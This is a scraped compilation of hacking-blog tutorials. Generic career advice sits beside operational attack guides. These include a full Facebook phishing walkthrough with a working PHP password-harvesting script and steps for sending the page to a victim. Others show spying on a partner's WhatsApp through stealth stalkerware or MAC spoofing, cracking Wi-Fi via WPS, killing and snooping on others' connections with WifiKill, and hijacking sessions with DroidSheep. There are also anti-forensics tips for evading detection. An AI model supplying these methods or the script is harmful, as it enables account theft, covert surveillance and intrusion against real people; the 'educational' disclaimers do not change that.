      Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

      1. Learn UNIX/LINUX

      linux operating system
      UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.




      2. Code in C language 

      c programming
      C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

      3. Learn to code in more than one Programming Language

      programming languages


      It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.


      4. Learn Networking Concepts

      computer networking
      Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
      Understanding what LAN, WAN, VPN, Firewall is also important.
      You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.


      5. Learn More Than One Operating Systems 

      operating system
      It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.


      6. Learn Cryptography

      cryptography encryption
      To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.


      7. Learn more and more about hacking

      hacking or hackers
      Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

      8. Experiment A Lot

      experiment
      After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

      9. Write Vulnerability (Loop hole program)

      hacking vulnerability

      Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.



      10. Contribute To Open Source Security Projects

      open source software
      An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

      11. Continue never ending Learning 

      learning hacking
      Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

      12. Join Discussions and meet hackers 

      discussion
      Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.


      How to Hack Whatsapp


      WhatsApp Spy: Spy on WhatsApp Messages








      WhatsApp Spy


      Relax, Here is a Complete WhatsApp Spy Guide!
      WhatsApp is one of the most widely used instant messaging applications during the recent years. Attractive features like cross-platform support and media sharing has made WhatsApp to be the top choice among most users. On the other hand, WhatsApp has also become a favorite application for many cheaters to exchange secret messages and maintain illicit relationships. Therefore, in order to investigate the truth about their partners or children it becomes inevitable for many individuals and parents to spy on WhatsApp.

      Ways to Spy on WhatsApp

      Some of the possible ways to spy on WhatsApp messages are as described below:

      1. WhatsApp Spy using a Spy App: Easiest Way

      Using a spy app is the easiest way to spy on WhatsApp messages. Although there are a handful of companies marketing substandard WhatsApp spy apps on the market today, there exists a few genuine ones as well that are worth considering. One of my favorite app to spy on WhatsApp is mSpy which is known for its quality and top notch features.
      WhatsApp Spy with mSpy
      The following are some of the exciting features of mSpy which makes it a perfect to spy on WhatsApp messages:
      mSpy Features:
      • Spy on WhatsApp Messages and Chats.
      • WhatsApp Spy on Group Messages.
      • Spy on Internet activity including social media like FacebookWhatsApp,Twitter and Gmail.
      • Spy on GPS locations in real-time.
      • Spy on WhatsApp Contacts.
      • Spy on keystrokes, photos and videos.
      • Spy operation works in a complete stealth mode and thus remains undetected!.

      How it Works?

      You will have to download and install the mSpy app onto the target phone where you need to spy on WhatsApp messages. Installation and configuration takes only a few minutes. However, for this you should have the target phone in your hand at least for a few minutes.
      Once the installation is complete, the monitoring process of all the above mentioned activities (WhatsApp messages, calls, SMS, Internet, GPS, camera etc.) will begin and the recorded logs are silently uploaded to your mSpy account. You can login to your online account at any time to view the logs containing WhatsApp messages and other activity details. You can download mSpy from the link below:
      Compatible Phones: Android, BlackBerry, Apple iPhone, Windows Mobile, iPad and Tablets.

      2. Spoofing the MAC Address: The Difficult Way

      The other way to spy on someone’s WhatsApp messages is to spoof the MAC address of the target phone from your phone. This method is somewhat considered difficult and require a moderate amount of technical skills to perform. Let me explain.
      WhatsApp has a small vulnerability which allows you to run the same WhatsApp account on two phones provided they both have the same MAC address. For this, you will have to gain access to the target phone to record its MAC address and spoof the same on your device. This is how you can find the MAC address of the target phone:
      For Android – Head over to Settings —> About phone —> Status—> Wi-Fi MAC address
      For iPhone – Head over to Settings—> General —> About —> Wi-Fi address
      For Windows Phone – Head over to Settings —> About —> More info —> MAC address
      For BlackBerry – Head over to options —> Device —> Device and Status info —> WLAN MAC
      Once you have recorded the target phone’s MAC address, you will have to spoof the MAC address on your android phone. After this is done, install WhatsApp on your phone, configure it using the target person’s phone number and verify the WhatsApp account using the verification code received on the target phone.
      If you successfully manage to execute all the above mentioned steps, you will have a replica of the target user’s WhatsApp account running on your phone. That means you will receive notifications on your phone for each and every activity of the target WhatsApp user. To spy WhatsApp messages, I still recommend the usage of mSpy as this method is lot simpler than that of spoofing MAC address.
      DISCLAIMER: USAGE OF SPY PROGRAMS WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!

      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.


      How to access "Kickass Torrents" website in India


      Kickass Torrents not loading! Well you must know that recently an Indian High Court ordered the major internet network providers to block pirate websites like "Kickass Torrents", "The Pirate Bay" etc.
      Bad Bad News for torrent users!!! 

      Well there is a good news too! You can access it, even when it is blocked. 



                                                                    A look of the website

      Well Here Is The Solution

      1. Open Google Chrome.

      2. In Google Chrome Go To Settings > Extensions .

      3. In Extensions Menu Click On Get More Extensions.



      4. After That In Search Menu Type 'Vpn'

      5. Then Select The Extension Mentioned Below In The Picture And Add It To Chrome


      6. After You Add It To Chrome The Click on Connect Like This.

      7. After Connecting You Can Open Kickass Torrent From This Link 

      8. You Must Disconnect From The Widget To Access Normal Sites Like Mediafire & Flipkart etc.
                                                 

      Click On This Link 

      Enjoy





      How To Set Up Adsense



      Adfly Not Loading 100% Working Solution


      How adfly related to Indian publishers?


      India is the top country that blocked adf.ly based on the number of users. Due to the blocking lots of bloggers and web publishers lost their revenue. This blocking affected thousands of web links that receives huge amount of web traffic. I had lost 30 links that receives more than 10000 visitors a day. But I had changed the link as I mentioned below. There are many those who don’t know about this update. If you are one among them try to change your adfly links.

       How to solve Adf.ly Not loading problem?


      Well you are here to know how you can unlock or unblock Adf.ly website to gain potential.  From the middle of 2013 Indian Telecommunication Department had blocked it due to several reasons. This block had affected half of Indian Bloggers and crores of links related to adf.ly. It is die hard to change those links already posted on articles and forums. If you have some knowledge in this field, you can unlock blocked adfly website easily. Follow the below steps.

      Solution: http to https


      This is the easiest and recommended solution to unblock blocked adf.ly website. In India the URL http://adf.ly is blocked. India haven’t blocked https://adf.ly

      Enjoy



      How To Hack FB With Phishing

      Hello In This Post You Can Learn How To Make FB Phishing.


      As we all want to hack our friend facebook account,and want to read all his personal things.
      Today i m gonna teach you how to hack a facebook account with a phishing page.


      phishing:

      Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

      today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

      FACEBOOK PHISHING....


                                                                               


      steps to create a phishing page:

      1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.
      2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
      3.Now open the notepad and press CTRL+F,and type ACTION.
      4.You will have to find a text which looks like ..

                                             action="https://www.facebook.com/login.php?login_attempt=1"

      5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                       action="post.php"

      6.Now save it on your desktop with the name index.htm,not index.html,remember.

      7.Now your phishing page is ready.it will look like a pic given below .




                                                         
      8.Open a new notepad and save the given data with the name post.php.

      <?php
      header ('Location:http://www.facebook.com/');
      $handle = fopen("usernames.txt", "a");
      foreach($_POST as $variable => $value) {
         fwrite($handle, $variable);
         fwrite($handle, "=");
         fwrite($handle, $value);
         fwrite($handle, "\r\n");
      }
      fwrite($handle, "\r\n");
      fclose($handle);
      exit;
      ?> 

      9.You have two files now one is index.htm and another is post.php,remember file extension is important.

      10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

      11.I prefer u to use 000webhost because it will be easy to use.
                                 

      12.You have to make a account in that ,after that it looks like a picture given below.

      13.Now go control pannel,then on file manager.

      14.After that a new window will pop up.Now go to public_html.


      15.Delete the file named default.php,after that upload two files index.htm and post.php one by one .



                                              
      16.Now the last step click on view of index.htm it will look same as facebook page.



      17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

      18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                      

      19.Click on view now u will have your friend's password and email id.


      20.This is a simple trick to hack any Facebook password account by phishing page.

      21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
            in to the description of that video u will find a prepared module of phishing pages,download  
            it and enjoy.



             click here to view a video tutorial with the readymade phishing pages....


      note:

      phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
      Not only Facebook u can make any phishing page of any website by following these steps....
      u can hack Gmail,Yahoo,Orkut,Twitter and many more.....







                                                     

      Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....

                                                                 thank you....


      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.                                         



      How To Hack Or Crack Wifi Password Using Android Phone

      How To Hack Wifi Password Using Android Phone
      (Note:- Wifi Hacking Is illegal Only Use These Tricks To Recover your wifi password or Education purpose)

      HACK WiFi using Android phone. So Today i m posting how to hack WiFi password in less than 1 min with App Name WiFi Wps Wpa tester And Wps Connect .These apps available on Google app store.

      So Today i m posting how to hack WiFi password in less than 1 min with App Name WiFi Wps Wpa tester 

      Requirements:

      (1.) Rooted Android Device (4.0+ recommend)
      To Root Your device Try Kingo Root To Root Your Device From Pc.If You Don"t Want To Use Pc Try King Root Simply Search on Google Play King Root and Install Then Root Your device.
      (2.) Busybox Installed. Terminal Emulator installed.
      To Download Busy Box Easily search On Play Store And download.

      HACK WiFi using WiFi Wps Wpa tester : Just download and Install this app From Click Here. Make Sure You Have Enabled The Unknown Sources In Settings/ Open app and press refresh. Then the list of WiFi networks available will be shown. If you see a green Lock Icon click on it Press Try to Connect.
      HACK WiFi using WPS Connect : Just Download This App From App Store Launch the app turn on the Wifi and Scan the Network Click On Network to Connect and Try any Pin which Is Given . See password by clicking on Right Icon and Enjoy.

      After Connecting Enjoy.

      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.


      How to bypass Android’s lock screen pattern, PIN or password

      How to bypass Android’s lock screen patter

      PIN or password





      The main reason to set up some sort of lock screen security on your smartphone is to keep strangers (or friends) from checking out your messages or private pictures. Beyond that, you don’t want anyone who dares to steal your phone to get full access to your mails, pictures or other sensitive data. But what if you’re the one who cannot access your phone? You could forget your PIN or pattern, right? Or someone pranks you by setting up a lock screen pattern and just leaves you struggling with it.
      echo adrotate_ad(4, true, 0, 0);
      In any case, there’s quite an easy solution to this without smashing your phone against a wall (or your friend’s face). The only thing you need is to have Android Device Manager enabled on your device (before you locked yourself out of your phone). If you have a Samsung phone, you can also unlock your phone using your Samsung account.

      Forgot your Android lock screen pattern, PIN or password? Here’s what to do

      I tested the following methods using a lock screen pattern, PIN and password and was able to unlock my LG G2 with Android 4.4.2 successfully.

      Unlock your Android device using Android Device Manager (ADM)

      As already mentioned, the following method only applies to devices that have Android Device Manager enabled.
      1. On a computer or other mobile phone, visit: google.com/android/devicemanager
      2. Sign in using your Google login details that you also used on your locked phone.
      3. In the ADM interface, select the device you need to unlock (if it isn’t already selected).
      4. Select ‘Lock’
      5. In the appearing window, enter a temporary password. You don’t have to enter a recovery message. Now click ‘Lock’ again.
      6. If it was successful, you should see a confirmation below the box with the buttons Ring, Lock and Erase.
      7. On your phone you should now see a password field in which you should enter the temporary password. This should unlock your phone.
      8. Now, before you go on with your life, go to your phone’s lock screen settings and disable the temporary password.
      9. That’s it!
      ADM-lock

      Unlock your Android lock screen pattern with your Google Login (only Android 4.4 and below)

      echo adrotate_ad(5, true, 0, 0);
      If you haven’t updated your firmware to Android Lollipop (5.0), then there’s a faster way to unlock a lock screen pattern.
      lock-screen-lg-g2
      1. Enter a wrong lock screen pattern five times (shouldn’t be hard if you don’t remember the correct one)
      2. Select ‘Forgot Pattern’
      3. Now you should be able to enter a backup PIN or your Google account login.
      4. Enter either your backup PIN or your Google login.
      5. Your phone should now be unlocked.
      backup-pin

      Bypass your Samsung phone’s lock screen using its Find My Mobile tool

      This is an easy way to unlock your Samsung device if you created a Samsung account and registered it beforehand.
      find-my-mobile-unlock2
      1. Go to Samsung Find My Mobile.
      2. Sign in using your Samsung login details.
      3. In the Find My Mobile account interface you should see your registered phone on the left hand side. This tells you that you’re phone is registered to that account.
      4. On the left sidebar, select ‘Unlock my screen’.
      5. Now select ‘Unlock’ and wait for a few seconds for the process to finish.
      6. You should get a notification window telling you that your screen is unlocked.
      7. That’s it. Your phone should be unlocked.
      find-my-mobile-unlock

      Disable your lock screen using custom recovery and “Pattern Password Disable” (SD card needed)

      This method is for more advanced Android users that know what the terms “rooting” and “custom recovery” mean. As the title says, for this to work you need any kind of custom recovery installed and your phone must have an SD card slot. Why the SD card? Well, we need to transfer a ZIP file to your phone and that’s usually not possible when it’s locked. The only way is to insert an SD card with the file.Unfortunately, card slots became kind of a rare thing in the smartphone world, so this will only work for some people.
      Here’s what you need to do:
      1. Download the Pattern Password Disable ZIP file on your computer and put it on an SD card.
      2. Insert the SD card into your phone.
      3. Reboot your phone into recovery.
      4. Flash the ZIP file on your SD card.
      5. Reboot.
      6. Your phone should boot up without a locked screen. Should there be a password or gesture lock screen, don’t panic. Just type in a random password or gesture and your phone should unlock.

      More proven methods to unlock your phone 

      It’s possible that none of the options above got you passed the lock screen. Luckily, some of our readers struggling with that issue were able to find even more creative ways to bypass their lock screen and were so kind to share them. We’re extremely thankful for that!
      We haven’t tested them throroughly on multiple devices or Android versions, so we cannot promise that those will work for you. However, a number of people managed to access their phone again and we hope you’ll do so as well.
      Submitted by starr:
      1. Call your locked phone from another one.
      2. Accept the call and hit the back button during the call
      3. This should give you complete access to your phone
      4. Go to your phone’s security settings and try to remove the pin or pattern. To do so, you first need to put in the current one, which you obviously don’t know anymore. The only way is to guess and try out different combinations until you get it right. Should you get this far, then you can disable the pin or set a new one.
      Submitted by Zubairuddin Buriro (probably only applicable to LG phones):
      Zubairuddin’s very creative method can help you out in case you’re Wifi and data connection are both turned off. As mentioned above, this method might only work on LG phones, since it relies on LG’s native quick memo app.
      1. Press and hold the volume up key, until the Quick Memo app launches.
      2. Draw something random into it.
      3. Tap the sharing button and select SmartShare.
      4. Selecting SmartShare should activate your phone’s Bluetooth and Wifi (important here is Wifi).
      5. Make sure you’re close to a Wifi network that you’re phone connects to automatically.
      6. Now, you’re back online and you can go ahead and try all the methods discussed above that require a data connection.

      Erase your phone (and lock screen) using Android Device Manager

      If all the methods above didn’t work out, you need to move on to more drastic measures. In case Android Device Manager is enabled on your phone and unlocking it didn’t work, you can use it to erase all data by selecting the Erase button. Be aware that this will delete all apps, settings and other data on your phone. The good thing is, once the erasing process is done, you can use your phone again (after setting everything up).

      Reset your phone to factory settings

      If Android Device Manager doesn’t work at all for you, your last resort is to make a factory reset on your device. On Nexus devices, this can be done in recovery mode, for example. Below, we take you through the reset process that work with Nexus devices. If you own a different Android phone, check out this site and look for your manufacturer’s support page.

      How to perform a factory reset on your Nexus using recovery mode:

      Important note: If your Nexus device is running Android 5.1 or higher, you’re required to enter a Google username and password associated with your device after the factory reset process finishes. This is a security measure to make sure that no stranger is reseting your phone or tablet. If you fail to enter that data, the phone won’t be usable anymore. Really make sure you know your Googel username and password.
      No matter what version of Android you’re running, you need to have an internet connectionand if you just changed your Google account password, you need to wait at least 72 hoursbefore starting the reset process.
      1. Turn off your device.
      2. Press the volume down AND power button and keep pressing them. Your device will start up and boot into the bootloader (you should see “Start” and an Android lying on its back).
      3. Press the volume down button to go through the different options until you see “Recovery Mode” (pressing volume down twice). Now press the power button to enter recovery mode.
      4. You should see an Android on its back and a red exclamation mark.
      5. Press and hold the power button, then press and release the volume up button. Now you should see “Android Recovery” written on the top together with some options.
      6. By pressing the volume down button, go down the options until “Wipe data/factory reset” is selected. Press the power button to select this option.
      7. Using the volume down button again, go down until “Yes – erase all user data” is selected. Make sure you read through the notes above and then, finally, press the power button to start the reset process.
      8. Once the process is done, press the power button to select the reboot option. Your device will now reboot and start the inital setup process of your device. That’s it! All you need to do now is to set up everything and restore your data.
      You can also check out Google’s official page and follow the instructions there.
      As already mentioned earlier, be aware that reseting or erasing your device will delete all data like apps, settings, videos and pictures.

      Last words

      Should you set up a new lock screen PIN or pattern. Make sure to write down the numbers or pattern on a piece of paper or in a text file on your computer to avoid that hassle the next time. If you run into any problems using the methods above, feel free to leave a comment.


      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

      How to Become a Master Hacker – A Complete Guide for Beginners

      Most of the aspiring techies have an intense passion for becoming a hacker but don’t know where to start. Some enthusiastic network newbies have a strong desire to learn how to be a wizardly hacker. In computer security, a hacker is someone who converges on the safety mechanisms of computer and network systems. Upon listening to the phrase Hacker, most of us get into mind is that they are the people who break into computers and mess up everything on your device. This is what many of the ordinary people symbolize hacking in modern culture. But, hacking culture is not just chopping one’s device rather it is much more complicated and ethical than most people know.
      How to Become a Hacker
      People often search on the web with queries like “How to Become a Hacker”, What are the Skills required to become a hacker”, What is the Best Way to Learn to hack,” “Where to start” and much more. I have come up with a detailed guide on how to become a hacker so that it can help all those enthusiastic techies who are craving to know much about hacking. If you are highly fascinated to learn basic hacking techniques, then you have landed in the right place. Check out this detailed guide on hacking and gain admiration to crack your way into the intricate world of hacking.

      Hacker Attitude

      Hackers are the one who build things and solve problems. The mindset of a hacker is not just confined to this software-hacker culture comprising of expert programmers and networking wizards. The attitude of a hacker is somewhat different from others as their nature is totally independent of the specific medium the hacker works in.
      Hackers believe in freedom and voluntary cooperation. To become a hacker, you should behave as if you have this kind of attitude yourself. To behave as if you have the attitude, you have to believe truly the attitude. By cultivating hacker attitudes, it can help you learn more and keeps you motivated. The most powerful way to become a master in any field is to imitate the attitude of masters not simply intellectual but passionate as well. Here are few points that shows how one can become a hacker by cultivating their mindset and attitude.

      1. The world is chock-full of interesting problems waiting to be solved.

      Being a hacker often seems to be loads of fun, but it takes a lot of effort followed by motivation. To become a hacker, you have to get a basic boost from solving problems, sharpening your skills, and exercising your intelligence.

      2. No problem should ever have to be solved twice.

      You must keep in mind that creative brains are always precious, limited resource. Never waste your time on re-forming the wheel when there are so many interesting new problems waiting out there.
      You need to believe that the thinking time of other hackers is valuable. Hence, it is a noble responsibility for you to share knowledge, solve problems and then give away the solutions so that other hackers can focus on solving new problems instead of holding to enduringly re-address existing ones.
      However,  “No problem should ever have to be solved twice” does not mean that you have to consider all existing solutions as pious, or that there is only one precise solution to any given problem. We come across many problems and a solution for that. It is often necessary to consider that we can do better. But, sometimes technical barriers or something else might block a good solution from being re-used and instigate people to re-discover things.

      3.  Attitude is no replacement for proficiency.

      To become a master hacker, you need to develop some of these attitudes. But stealing an attitude solely won’t make you an immediate hacker. Becoming a hacker certainly requires intelligence, practice, dedication, and hard work.
      Hence, you have to learn to disbelieve attitude and esteem competence of every kind. Hackers won’t let hypocrites waste their time, but they admire competence, especially proficiency at hacking, but proficiency at anything is assessed. Hard work and dedication are a must that plays a significant role to becoming a hacker.

      4. Boredom and drudgery are destructive.

      Hackers should neither be bored nor have to menial at mindless, monotonous work. Boredom and drudgery are not just disagreeable but truly evil. It is pretty much good that you need to stay away from boring bits, as much as possible, not just for yourself but for everybody else (especially other hackers).

      5. Be Creative

      If you wish to become a hacker, you need to be creative and start thinking artistically. Hackers should be like a blend of artists, engineers, and philosophers. Hackers have a diversity of interests culturally and intellectually, apart from hacking.

      What Skills are Required to Become a Hacker?

      In simple words, there is no magic to becoming a Hacker. But, like anything else that is important, it takes dedication and enthusiasm to learn. It is necessary to have a basic knowledge of various topics that you can check out in below steps. These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this area, you can move into the intermediary level.

      Fundamental Skills

      The best approach to turn yourself into a hacker is to begin from the fundamentals. Initially, you will have to master the basics to build a solid foundation. And once this is done, you’ll be in a position to explore new ideas and start thinking like a hacker. You can follow the below-mentioned points to start off your job as a hacker.

      1. Explore the Basics

      It is an essential need to become a hacker you need some basic computer skills. These basic skills go above the ability to create a Word document or navigate the Internet. You need to be able to use the command line in Windows, edit the registry, and set up your networking parameters. Before heading to learn the concept of hacking, you need to spend pretty much time doing some online research to find out more information about hacking. This will help you lay the groundwork for your future steps and actions.

      2. Technical Skills

      If you’re aiming to become an average to a good hacker, you need to acquire the following technical skills.
      >>Programming
      • This is the fundamental hacking skill. Learning to program is like learning to write a good natural language.
      • You need to learn how to solve problems and automate tasks.
      • To become an elite hacker, programming is the most important skill that you can’t neglect.
      • It is always better to have some basic knowledge of programming languages like C, HTML, PHP, JavaScript, etc.
      >>Operating System
      • There are several operating systems apart from UNIX.
      • Windows operating system is one of the most commonly compromised systems. Hence, it is good to learn hacking Microsoft systems, which are closed-source systems.
      • Learn everything about OS on how to operate them, working procedure, accessing to API’s and much more.
      • To become a great hacker, you need to know the cons of these operating systems and try to target them in a systematic manner.
      >>Networking
      You need to understand the basic concepts of networking and the inner operations as well. You need to learn in deep how each type of packet is generated and the tweaks you can do manipulating them. You need to gain pretty good knowledge on the following concepts.
      • Subnet, LAN, WAN, VPN
      • DHCP
      • IPv4, IPv6
      • DNS
      • OSI model
      • MAC addressing
      • ARP
      >>Website Hacking
      There are loads of techniques to do website hacking, just google OWASP.
      If you wish to become a ninja, you need to gain more knowledge on below given concepts:
      >>Cryptography
      • If you acquire deep knowledge in cryptography that includes usage, implementation and breaking process, then it would be much better to become a great hacker.
      • The more you learn the strengths and vulnerabilities of each cryptographic algorithm, the better the possibilities of overcoming it.
      • Moreover, cryptography can be used by the hacker to conceal their activities and avoid detection.
      >>Reverse Engineering (& debugging)
      • Reverse engineering allows you to remove a bit of malware and re-build it with additional features and capabilities.
      • You need to learn how to debug or disassemble and analyze software to understand how a software processes its data and the process of info extraction from memory at run time.
      • Reverse engineering enables the hacker to take an existing exploit and improve its signature so that it can hop former IDS and AV detection.
      >>(Anti-) Forensics
      • You will be considered as an expert hacker only when you are not caught! If you were caught hacking, then you can’t become a pro hacker.
      • The more you know about digital forensics, the better you can grow at avoiding and evading detection.
      • Learn where incriminating information is stored and also understand how to erase them in a secure way.
      >>Exploit writing
      • You need to know debugging and computer memory to do this.
      >> Virtualization
      • You need to become proficient in using one of the virtualization software packages that includes VirtualBox or VMWare Workstation.
      • You need a secure and protected environment to practice your hacks prior implementing them out in the real world.
      • A virtual environment is the best place that provides you a protected environment to test and refine your hacks.

      3. Find a Good Source to Begin

      It is pretty much arduous to find the best source to begin from the basics. Despite there exists millions of books and other sources on the web that will teach you how to hack, they all need readers to have a set of pre-established skills and knowledge to understand the concepts introduced in them. However, all such sources might not suit your requirements.
      Here is a great source that helps the beginners to gain much knowledge on hacking so that the readers could understand each and every concept with much ease. This book is called Hacking Secrets Exposed (HSE) that is advised for the aspiring techies who have a strong desire to commence their quest to becoming a hacker.

      How Long does it Take Become a Hacker?

      This question is little difficult to answer since it is not something that can be mastered overnight. It requires knowledge, skills, creativity, dedication and, of course, the time. Everyone can become a hacker provided they learn it from the fundamentals and build a strong foundation. So, if you aspire to be a hacker all you need is passion and enthusiasm to learn and a good source of knowledge that will guide you through different concepts right from the basics. The most important factor to become the best hacker is persistence.
      It also depends on how talented you are and how strong you work at it with much determination. Most people who try can obtain a decent skill set in eighteen months to two years if they completely concentrate on it. However, hacking is a vast ocean which takes years to explore its mystery. And if you are a genuine hacker, you will spend the rest of your life learning and developing your craft.

      Age to Start Learning to Hack

      The right age to start learning to hack is any age at which you are motivated. Most people seem to get interested between ages 15 and 20, but you need to know exceptions in both directions.
      If you have all the above-mentioned skills, you can become a skilled hacker so that you can start implementation in the real world. Above mentioned are the full steps on how to be a hacker that can help you walk the road of being an expert hacker. Follow the complete guide which I’ve explained in the tutorial to gain pretty much knowledge about hacking and become a pro in hacking!
      Keep in mind that for every hacking tool, there is always a counter hacking tool. Therefore, be a smart hacker and more importantly, be a responsible hacker.
      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.


      Hack Wi-Fi Network using 'WifiKill' App for Android – Features, Requirements & Working Procedure



      For most of us it happens that, sometimes you might be working on some important task and suddenly your net speed has become extremely slow which is because of some other people using the internet for watching unnecessary stuff. You may get frustrated, but instead of showing frustration on that particular person, you can their internet connection which is on the same network. Isn’t it a good idea? Now, you can blissfully complete your work without any impediments. Again, you might get a doubt. How is it possible to disable others internet connection on the same network?
      Well, using WifiKill, it is possible to hack one’s network connection. WifiKill is an android app which is used to kill the connection of those who are irrelevantly using the internet and misusing the bandwidth. You can then stay comfortable with a full bandwidth just for yourself. Here is a complete tutorial about WifiKill, its features, requirements, working procedure and how to hack a Wi-Fi network using WifiKill. Have a look!

      What is WifiKill?

      WifiKill is an android application that helps you to disable other people’s Wi-Fi internet connections on the same network. It is a kind of hacking process in which you are hacking other person’s internet connection and trying to disable it. This app is specifically developed for the Android smartphone users. You can easily become a hacker as WifiKill literally falls in the category of hacking and this application is capable of searching for the user information in the Wi-Fi modem.
      WifiKill
      WifiKill v2.3.2 is an amazing app through which you can get a wi-fi connection in full speed by using this application. You can easily eliminate unnecessary users who are connected to wi-fi connection on the same network. You can use this app on your android smartphone as it works effectively to disable other’s internet connection.

      Features of WifiKill

      • Show the traffic consumed by the device.
      • Grabs blog traffic and show the sites visited by the grabbed devices.
      • Show the network names of the devices.
      • Reveals the total number of bytes transferred by the ‘snatched device’.
      • Capable of disabling the Internet access of any grabbed device.
      • You can also view what other’s are surfing on internet and even see what they download from internet.
      • It supports Tablets and hence it is both mobile and tablet-friendly!
      • WifiKill supports Android 4.0 and above only.

      Requirements of WifiKill

      • It requires Root accessibility.
      • Works for Android 4.0 and above only.

      How to Hack Wi-Fi Network – Working Process

      Using WifiKill app, you can easily disable one’s internet connection (Wi-Fi) which is on the same network. The capability of disabling other person’s Wi-Fi network connection is nothing but hacking their device. Here is a step-by-step procedure to hack a Wi-Fi network using WifiKill app on your android device.
      Note: This app has been removed from the android market as it can be easily misused in different ways. It may be a potential threat to public Wi-Fi connections. You can download it from the link provided below:
      Step 1: Initially, download it from the above link.
      Step 2: Now, turn ON Wi-Fi on your Android phone and click to open the app.
      Step 3: After opening the app, press the play button located on the top and the app will then start searching for the devices which are currently connected to the Wireless Internet network. Click on Grant to allow Superuser permission that is prompted on the screen.
      WifiKill - Grant Superuser request
      Step 4: As soon as the scan for devices is completed, the app will then show all the devices connected to the hotspot. If you enable Show Network Names in the preferences, it will also display the names of all the devices found.
      Hack wifi network using WIfiKill
      Step 5: Now, Click on one device and slide the grab button .Once grabbed you can see the network usage and websites that are being accessed by it.
      Step 6: In order to disable the Internet access of grabbed device, just Slide the kill button and the device will lose the internet connectivity.
      WifiKill - Grab and kill internet connection
      Step 7: You can kill one device at a time or else you can also kill all the devices at the same time by grabbing them all and then killing them. You can only kill after you have grabbed a device. Grabbing the device will show you the bandwidth consumption and websites accessed by that particular device. The device will lose the internet connectivity when you Choose to kill it.
      WifiKill - Kill all connections
      Step 8: When you are done, you can just switch off the kill button so that the devices will regain their Internet connectivity. Also don’t forget to stop the WifiKill by using the same button you used to start it.
      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.

      Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided. How To Hack Fb By Hijacking


      Hacking facebook account with DROIDSHEEP

      Download DROIDSHEEP from here

      IN order to hack facebook account you must be on same wifi network of the victim

      YOU MUST HAVE
      #1 Root
      #2 SuperUser
      #3 BusyBox
      #4 Android phone
      #5 Droidsheep

      Install Droidsheep
      once the victim has started his facebook account (needed)
      before that you should start droidsheep
      Check Both options

      "APR-Spoofing
      Generic mode"

      press start

      once the victim does an activity on their facebook account a new session would be recorded
      long press the session and press open site

